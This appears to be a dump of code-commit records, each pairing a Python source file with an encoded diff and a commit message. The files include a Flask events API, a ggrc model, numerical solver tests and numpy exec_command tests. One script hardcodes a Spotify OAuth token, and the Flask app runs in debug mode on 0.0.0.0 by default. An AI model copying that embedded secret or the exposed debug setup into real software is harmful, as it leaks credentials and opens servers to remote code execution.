from flask_sslify import SSLify # redirect to https
import os
import logging
FORMAT = "%(levelname)s:ABE: _||_ %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
from .resource_models.event_resources import EventApi
from .resource_models.label_resources import LabelApi
from .resource_models.ics_resources import ICSApi
app = Flask(__name__)
CORS(app)
SSLify(app)
api = Api(app)
# add return representations
@api.representation('application/json')
def output_json(data, code, headers=None):
resp = jsonify(data)
resp.status_code = code
resp.headers.extend(headers or {})
return resp
# Route resources
api.add_resource(EventApi, '/events/', methods=['GET', 'POST'], endpoint='event')
api.add_resource(EventApi, '/events/<string:event_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='event_id') # TODO: add route for string/gphycat links
api.add_resource(EventApi, '/events/<string:event_id>/<string:rec_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='rec_id') # TODO: add route for string/gphycat links
api.add_resource(LabelApi, '/labels/', methods=['GET', 'POST'], endpoint='label')
api.add_resource(LabelApi, '/labels/<string:label_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='label_name')
api.add_resource(ICSApi, '/ics/', methods=['GET', 'POST'], endpoint='ics')
api.add_resource(ICSApi, '/ics/<string:ics_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='ics_name')
@app.route('/')
def splash():
return render_template('splash.html')
@app.route('/add_event')
def add_event():
return render_template('add_event.html')
@app.route('/add_label')
def add_label():
return render_template('add_label.html')
if __name__ == '__main__':
app.debug = os.getenv('FLASK_DEBUG') != 'False' # updates the page as the code is saved
HOST = '0.0.0.0' if 'PORT' in os.environ else '127.0.0.1'
PORT = int(os.environ.get('PORT', 3000))
app.run(host='0.0.0.0', port=PORT)
|
Python
| 0.999999
|
@@ -197,16 +197,82 @@
to https
+%0Afrom flask.json import JSONEncoder%0A%0Afrom datetime import datetime
%0A%0Aimport
@@ -614,16 +614,261 @@
i(app)%0A%0A
+%0Aclass CustomJSONEncoder(JSONEncoder):%0A%0A def default(self, obj):%0A if isinstance(obj, datetime):%0A return obj.isoformat()%0A else:%0A return JSONEncoder.default(self, obj)%0A%0A%0Aapp.json_encoder = CustomJSONEncoder%0A%0A
# add re
|
ba1494afb962fb8fba84e306cfb4c26a83602b6d
|
update license
|
drink.py
|
drink.py
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2014 Chuck Housley
This work is free. You can redistribute it and/or modify it under the
terms of the Do What The Fuck You Want To Public License, Version 2,
as published by Sam Hocevar. See the COPYING file for more details.
"""
import os
from server import app, db
import server.model
if __name__ == "__main__":
db.create_all()
app.run(debug=True) # host='10.10.56.190')
|
Python
| 0
|
@@ -21,257 +21,8 @@
-*-%0A
-%22%22%22%0ACopyright (C) 2014 Chuck Housley%0AThis work is free. You can redistribute it and/or modify it under the%0Aterms of the Do What The Fuck You Want To Public License, Version 2,%0Aas published by Sam Hocevar. See the COPYING file for more details.%0A%22%22%22%0A%0A
impo
|
6b56ab963f46ac45caf0a2f3391fdedf9dfabb39
|
Fix python2 compatibility
|
create_dataset.py
|
create_dataset.py
|
import os
import shutil
import spotipy
import pickle
import pandas as pd
import numpy as np
from collections import Counter
if not os.path.exists("genres.p"):
# Login to Spotify and get your OAuth token:
# https://developer.spotify.com/web-api/search-item/
AUTH = "BQBHlFpkjjlfDwbyQ7v0F1p_cejpmYARG6KDclVlP3HZyb4MG3_Mc40tE__HsuFXGQvYRvOi1Mbfx-_FoA9DVXCpNupL0X8XFFbL1XghQCf6mH_yXc82GqWAtrLjUtc-eWIDBpci1M0"
if not os.path.exists('clean_midi'):
# Download the 'Clean MIDI' dataset from http://colinraffel.com/projects/lmd/
import urllib.request
import io
import gzip
FILE_URL = 'http://hog.ee.columbia.edu/craffel/lmd/clean_midi.tar.gz'
response = urllib.request.urlopen(FILE_URL)
compressed_file = io.BytesIO(response.read())
decompressed_file = gzip.GzipFile(fileobj=compressed_file)
with open(OUTFILE_PATH, 'wb') as outfile:
outfile.write(decompressed_file.read())
# Get artists from folder names
artists = [item for item in os.listdir(
'clean_midi') if not item.startswith('.')]
sp = spotipy.Spotify(auth=AUTH)
genres = {}
for i, artist in enumerate(artists):
try:
results = sp.search(q=artist, type='artist', limit=1)
items = results['artists']['items']
genre_list = items[0]['genres'] if len(items) else items['genres']
genres[artist] = genre_list
if i < 5:
print(artist, genre_list[:5])
except Exception as e:
print(artist, e)
# Save to pickle file
pickle.dump(genres, open("genres.p", "wb"))
else:
# Load genres meta-data
genres = pickle.load(open("genres.p", "rb"))
# Get the most common genres
flattened_list = [item for sublist in list(
genres.values()) for item in sublist]
MIDI_DIR = os.path.join(os.getcwd(), 'clean_midi')
def get_artists(genre):
"""Get artists with label `genre`."""
artists = [artist for artist, gs in genres.items() if genre in gs]
return artists
# Get artist with genres 'soft rock' and 'disco'
genre_data = {}
metal = get_artists('metal')
classical = get_artists('classical')
genre_data['metal'] = metal
genre_data['classical'] = classical
# Copy artists to a genre-specific folder
for genre, artists in genre_data.items():
try:
for artist in artists:
shutil.copytree(os.path.join(MIDI_DIR, artist), os.path.join(
os.getcwd(), 'subsets', genre, artist))
except Exception as e:
print(e)
|
Python
| 0.000303
|
@@ -1,12 +1,51 @@
+from __future__ import print_function%0A%0A
import os%0Aim
@@ -125,16 +125,17 @@
as np%0A%0A
+%0A
from col
@@ -1675,16 +1675,28 @@
%22, %22wb%22)
+, protocol=2
)%0Aelse:%0A
|
1b726978e1604269c8c4d2728a6f7ce774e5d16d
|
Fix edit control assessment modal
|
src/ggrc/models/control_assessment.py
|
src/ggrc/models/control_assessment.py
|
# Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: anze@reciprocitylabs.com
# Maintained By: anze@reciprocitylabs.com
from ggrc import db
from .mixins import (
deferred, BusinessObject, Timeboxed, CustomAttributable, TestPlanned
)
from .object_document import Documentable
from .object_owner import Ownable
from .object_person import Personable
from .relationship import Relatable
from .track_object_state import HasObjectState, track_state_for_class
from ggrc.models.reflection import PublishOnly
class ControlAssessment(HasObjectState, TestPlanned, CustomAttributable,
Documentable, Personable, Timeboxed, Ownable,
Relatable, BusinessObject, db.Model):
__tablename__ = 'control_assessments'
design = deferred(db.Column(db.String), 'ControlAssessment')
operationally = deferred(db.Column(db.String), 'ControlAssessment')
control_id = db.Column(db.Integer, db.ForeignKey('controls.id'))
control = db.relationship('Control', foreign_keys=[control_id])
# REST properties
_publish_attrs = [
'design',
'operationally',
'control'
]
track_state_for_class(ControlAssessment)
|
Python
| 0
|
@@ -1133,16 +1133,88 @@
l_id%5D)%0A%0A
+ audit = %7B%7D # we add this for the sake of client side error checking%0A%0A
# REST
@@ -1300,16 +1300,44 @@
control'
+,%0A PublishOnly('audit')
%0A %5D%0A%0Atr
|
e7d9a67611b2dc443c1f2bc23506323837d79bda
|
fix test_mcp
|
numerics/swig/tests/test_mcp.py
|
numerics/swig/tests/test_mcp.py
|
# Copyright (C) 2005, 2012 by INRIA
#!/usr/bin/env python
import numpy as np
import siconos.numerics as N
def mcp_function (z) :
M = np.array([[2., 1.],
[1., 2.]])
q = np.array([-5., -6.])
return dot(M,z) + q
def mcp_Nablafunction (z) :
M = np.array([[2., 1.],
[1., 2.]])
return M
# solution
zsol = np.array([4./3., 7./3.])
wsol = np.array([0. , 0.])
# problem
#mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
ztol = 1e-8
def test_new():
mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
def test_mcp_FB():
mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
z = np.array([0., 0.])
w = np.array([0., 0.])
SO=N.SolverOptions(mcp,N.SICONOS_MCP_FB)
N.mcp_driver_init(mcp, SO)
info = N.mcp_FischerBurmeister(mcp, z, w, SO)
N.mcp_driver_reset(mcp, SO)
#print("z = ", z)
#print("w = ", w)
assert (np.linalg.norm(z-zsol) <= ztol)
assert not info
|
Python
| 0.00002
|
@@ -109,37 +109,35 @@
def mcp_function
-
(z)
-
:%0A M = np.arr
@@ -157,32 +157,35 @@
%0A
+
%5B1., 2.%5D%5D)%0A%0A
@@ -220,16 +220,19 @@
return
+np.
dot(M,z)
@@ -262,13 +262,11 @@
tion
-
(z)
-
:%0A
@@ -283,32 +283,35 @@
rray(%5B%5B2., 1.%5D,%0A
+
%5B
@@ -501,34 +501,36 @@
mcp=N.MCP(1,
+
1,
+
mcp_function,mcp
@@ -518,32 +518,33 @@
1, mcp_function,
+
mcp_Nablafunctio
@@ -547,18 +547,16 @@
ction)%0A%0A
-%0A%0A
def test
@@ -829,25 +829,24 @@
cp, SO)%0A
-#
print(%22z = %22
@@ -854,17 +854,16 @@
z)%0A
-#
print(%22w
@@ -935,9 +935,8 @@
ot info%0A
-%0A
|
2fbdd9903fc9bf6e1fe797e92c0157abd67850ce
|
add robust tests for exec_command()
|
numpy/distutils/tests/test_exec_command.py
|
numpy/distutils/tests/test_exec_command.py
|
import sys
import StringIO
from numpy.distutils import exec_command
class redirect_stdout(object):
"""Context manager to redirect stdout for exec_command test."""
def __init__(self, stdout=None):
self._stdout = stdout or sys.stdout
def __enter__(self):
self.old_stdout = sys.stdout
sys.stdout = self._stdout
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush()
sys.stdout = self.old_stdout
def test_exec_command():
# Regression test for gh-2999 and gh-2915.
# There are several packages (nose, scipy.weave.inline, Sage inline
# Fortran) that replace stdout, in which case it doesn't have a fileno
# method. This is tested here, with a do-nothing command that fails if the
# presence of fileno() is assumed in exec_command.
with redirect_stdout(StringIO.StringIO()):
exec_command.exec_command("cd '.'")
|
Python
| 0.000001
|
@@ -1,12 +1,22 @@
+import os%0A
import sys%0Ai
@@ -475,16 +475,765 @@
stdout%0A%0A
+class redirect_stderr(object):%0A %22%22%22Context manager to redirect stderr for exec_command test.%22%22%22%0A def __init__(self, stderr=None):%0A self._stderr = stderr or sys.stderr%0A%0A def __enter__(self):%0A self.old_stderr = sys.stderr%0A sys.stderr = self._stderr%0A%0A def __exit__(self, exc_type, exc_value, traceback):%0A self._stderr.flush()%0A sys.stderr = self.old_stderr%0A%0Aclass emulate_nonposix(object):%0A %22%22%22Context manager to emulate os.name != 'posix' %22%22%22%0A def __init__(self, osname='non-posix'):%0A self._new_name = osname%0A%0A def __enter__(self):%0A self._old_name = os.name%0A os.name = self._new_name%0A%0A def __exit__(self, exc_type, exc_value, traceback):%0A os.name = self._old_name%0A%0A
%0Adef tes
@@ -1246,16 +1246,23 @@
_command
+_stdout
():%0A
@@ -1585,16 +1585,43 @@
command.
+%0A%0A # Test posix version:
%0A wit
@@ -1705,8 +1705,518 @@
'.'%22)%0A%0A
+ # Test non-posix version:%0A with emulate_nonposix():%0A with redirect_stdout(StringIO.StringIO()):%0A exec_command.exec_command(%22cd '.'%22)%0A%0Adef test_exec_command_stderr():%0A # Test posix version:%0A with redirect_stderr(StringIO.StringIO()):%0A exec_command.exec_command(%22cd '.'%22)%0A%0A # Test non-posix version:%0A # Note: this test reveals a failure%0A #with emulate_nonposix():%0A # with redirect_stderr(StringIO.StringIO()):%0A # exec_command.exec_command(%22cd '.'%22)%0A
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.